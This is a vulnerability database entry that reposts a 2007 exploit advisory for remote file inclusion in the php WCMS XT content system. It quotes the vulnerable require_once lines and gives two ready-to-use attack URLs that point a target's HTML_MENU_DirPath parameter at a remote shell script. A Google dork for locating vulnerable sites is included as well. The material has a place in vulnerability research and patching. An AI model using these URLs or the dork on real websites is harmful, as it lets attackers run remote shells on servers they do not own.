php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities

2007-10-03T00:00:00
ID SSV:7333
Type seebug
Reporter Root
Modified 2007-10-03T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #  php WCMS XT  0_0_7 BETA <=  Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search?hl=tr&q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS%3A+php+WCMS+&meta=
#
#Vuln Code
##############################################################################################
#
#ERROR1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php
#

// Neccessary Classes
   require_once $HTML_MENU_DirPath.'HTML/Menu.php';
   require_once $HTML_MENU_DirPath.'HTML/Menu/DirectRenderer.php';
   require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath
#
#Example1:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]]
#
##############################################################################################
#Vuln Code
##############################################################################################
#
#ERROR2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php
#
   require_once $HTML_MENU_DirPath.'HTML/Menu.php';
   require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath
#
#Example2:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=[[Sh3LLScript]]
#

##############################################################################################
#download:
#
#http://sourceforge.net/project/showfiles.php?group_id=160753&package_id=191865&release_id=419910
#
##############################################################################################
#
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#
#"HAYIRLI RAMAZANLAR...  ;)"
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################